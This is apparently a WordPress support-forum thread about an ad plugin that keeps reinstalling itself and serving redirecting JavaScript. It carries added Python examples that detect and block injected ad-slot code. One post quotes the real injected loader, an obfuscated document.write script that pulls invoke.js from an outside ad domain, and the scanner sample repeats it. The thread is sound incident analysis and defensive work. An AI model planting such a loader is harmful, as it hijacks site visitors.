• This plugin has been automatically installed on a website we administer twice now and both times it has been used to run a js exploit that redirects users away.

    This is a dangerous plugin

Viewing 7 replies - 1 through 7 (of 7 total)
  • Plugin Author Namith Jawahar

    (@namithjawahar)

    Please secure your website, what you are saying is technically impossible to do for a plugin.

    Thread Starter jeslabbert

    (@jeslabbert)

    I am securing it. The only thing that breaks my website on the front end is a javascript injection from your plugin. I have blocked this plugin from being installed, but it is vulnerable to exploits.

    I have been having the same issue for a few days now. When someone goes to my site, it redirects them to spam ads. I just changed my passwords so let’s see if that works.

    I keep deleting the plugin and it keeps re-installing itself.

    Plugin Author Namith Jawahar

    (@namithjawahar)

    What you guys are claiming is technically impossible. A plugin cannot install by itself. It seems your sites have been hacked and someone is installing the plugin on your sites to insert their ads. It's not possible for any plugin to install by itself unless there is some code already on the site which can do it.

    Also, Quick Adsense had a full security audit just a couple of months back from the WordPress plugin team and the plugin adheres to all WordPress plugin guidelines. Anyone is welcome to security audit the code. These are unfortunate allegations which have nothing to do with any plugin.

    Same issue here. Seems that this plugin is too easy to configure with SQL injection to insert malicious JS.

    Plugin Author Namith Jawahar

    (@namithjawahar)

    Can you help me with where the malicious code was inserted?
    Header / Footer / In one of the Ad Slots?

    This is really weird in the sense if someone malicious has elevated themselves with the permission to install plugins why would they alter a plugin code to insert their ads instead of directly editing your theme. I am assuming whoever is doing this is doing it to prevent detection.

    Having received three reports about this, I will add a feature to verify the authenticity of the data with a hash in the next version (which probably is the first for any plugin), but it's more important to actually figure out how someone is getting elevated permission to perform this database update.
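The verification the plugin author proposes above, as an added example written for this thread and not code from Quick Adsense or its author: each slot's HTML is stored together with an HMAC computed under a secret that lives outside the database (in WordPress that would be a constant in wp-config.php; here it is a constructed value). A write that reaches only the database, through SQL injection or a direct table edit, cannot produce a valid tag, so the render path refuses to output the slot. The function names, the `qads_` option prefix and the in-memory `options` dict standing in for wp_options are this example's own assumptions.

```python
import hashlib
import hmac
import json

# Secret kept outside the database (in WordPress: a constant in wp-config.php).
# Constructed value for this example; a real deployment generates it randomly.
SLOT_SECRET = b"constructed-example-secret-do-not-reuse"

# In-memory stand-in for the wp_options table: option_name -> option_value (JSON text).
options = {}


def _tag(slot_name, html):
    # Bind the tag to the slot name as well as the content, so a valid
    # (name, html, tag) record cannot be copied from one slot into another.
    msg = slot_name.encode() + b"\0" + html.encode()
    return hmac.new(SLOT_SECRET, msg, hashlib.sha256).hexdigest()


def save_slot(slot_name, html):
    """Legitimate save path (admin UI): stores the HTML together with its HMAC."""
    options["qads_" + slot_name] = json.dumps({"html": html, "tag": _tag(slot_name, html)})


def verified_slot(slot_name):
    """Render path: returns the stored HTML only if its tag verifies, otherwise ''."""
    raw = options.get("qads_" + slot_name)
    if raw is None:
        return ""
    try:
        rec = json.loads(raw)
        html, tag = rec["html"], rec["tag"]
    except (ValueError, KeyError, TypeError):
        return ""  # malformed or unsigned record: refuse to render
    if not isinstance(html, str) or not isinstance(tag, str):
        return ""
    if not hmac.compare_digest(tag, _tag(slot_name, html)):
        return ""  # tampered: refuse to render rather than ship the injected script
    return html


def inject_via_database(slot_name, html):
    """Attacker path: a write that touches only the database (e.g. SQL injection).
    Without SLOT_SECRET the attacker cannot compute a valid tag."""
    options["qads_" + slot_name] = json.dumps({"html": html, "tag": "0" * 64})


def swap_content_keep_tag(slot_name, new_html):
    """Attacker path 2: keep the existing (valid) tag but replace the HTML."""
    rec = json.loads(options["qads_" + slot_name])
    rec["html"] = new_html
    options["qads_" + slot_name] = json.dumps(rec)


def demo():
    """Legit content renders; a database-only injection is blocked."""
    save_slot("header", "<!-- legit ad -->")
    legit_ok = verified_slot("header") == "<!-- legit ad -->"
    inject_via_database("header", "<script src=//attacker.invalid/invoke.js></script>")
    blocked = verified_slot("header") == ""
    return legit_ok and blocked
```

This only closes the database-write path; as the author notes, an attacker who can already run PHP on the site can read the secret and sign whatever they like, so finding the original entry point still matters more.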

    Code has been inserted in the header/footer codes + in the "ads posts body" slots. As no widget has been added, the code was coming from the header one.
    The first 3 slots were fed + the last one ?? just in case we miss it when deleting the code ??

    That way, there is no malicious code in PHP files. This does not hit a PHP scanner.

    The malicious code gets inside the database using your plugin ??

    Here is an example of the code inserted

    "<script type="text/javascript">
    	atOptions = {
    		'key' : '4daf1db77f85db185034cebc94b70b32',
    		'format' : 'iframe',
    		'height' : 600,
    		'width' : 160,
    		'params' : {}
    	};
    	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://intersectionweigh.com/4daf1db77f85db185034cebc94b70b32/invoke.js"></scr' + 'ipt>');
    </script>"
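The snippet above sits in option values, not in PHP files, which is why a file-based malware scanner misses it. As an added example for this thread (not part of the post or the plugin), the scanner below runs over option rows, such as a database dump or the output of `wp option list --format=json`, and flags the traits of that snippet in general form: a script tag assembled from string fragments to defeat a naive "<script" grep, a `document.write` loader, and any script host not on an operator-maintained allowlist. The allowlist, the option names and the sample rows (including a reconstruction of the injected snippet with a placeholder host and key) are constructed for this example.

```python
import re

# Hosts an operator expects ad-slot scripts to load from.
# Constructed allowlist for this example; adjust to the ad networks actually in use.
ALLOWED_SCRIPT_HOSTS = {"pagead2.googlesyndication.com"}

# Script tag built from fragments, e.g. '<scr' + 'ipt ... </scr' + 'ipt>'
SPLIT_TAG_RE = re.compile(r"""['"]<scr['"]\s*\+\s*['"]ipt""", re.I)
# document.write(...) used to append a loader at runtime
DOC_WRITE_RE = re.compile(r"document\.write\s*\(", re.I)
# Host in a literal src attribute: src="https://host/..." or src="//host/..."
SRC_RE = re.compile(r"""src\s*=\s*['"]?(?:https?:)?//([a-z0-9.-]+)""", re.I)
# Host inside a concatenated URL fragment: '://host/...'
CONCAT_HOST_RE = re.compile(r"""['"]://([a-z0-9.-]+)/""", re.I)


def scan_value(value):
    """Return the indicator names found in one option value (empty list if clean)."""
    findings = []
    if SPLIT_TAG_RE.search(value):
        findings.append("split-script-tag")
    if DOC_WRITE_RE.search(value):
        findings.append("document.write")
    hosts = set(SRC_RE.findall(value)) | set(CONCAT_HOST_RE.findall(value))
    for host in sorted(h.lower() for h in hosts):
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append("external-script:" + host)
    return findings


def scan_options(rows):
    """rows: iterable of (option_name, option_value). Returns {name: findings} for hits only."""
    hits = {}
    for name, value in rows:
        findings = scan_value(value)
        if findings:
            hits[name] = findings
    return hits


# Constructed sample rows: a legitimate ad tag, a reconstruction of the injected
# snippet quoted in the thread (placeholder host and key), and an unrelated option.
SAMPLE_ROWS = [
    ("qads_header",
     '<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>'),
    ("qads_footer", '''<script type="text/javascript">
	atOptions = {'key' : '0000', 'format' : 'iframe', 'height' : 600, 'width' : 160, 'params' : {}};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://malicious.invalid/0000/invoke.js"></scr' + 'ipt>');
</script>'''),
    ("blogname", "My site"),
]


if __name__ == "__main__":
    for name, findings in scan_options(SAMPLE_ROWS).items():
        print(name, findings)
```

Legitimate ad code also contains script tags, so the scanner keys on obfuscation and unknown hosts rather than on "<script" alone; a plain allowlisted tag produces no finding, while the reconstructed injection trips all three indicators.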
  • The topic ‘Plugin installed without authorisation’ is closed to new replies.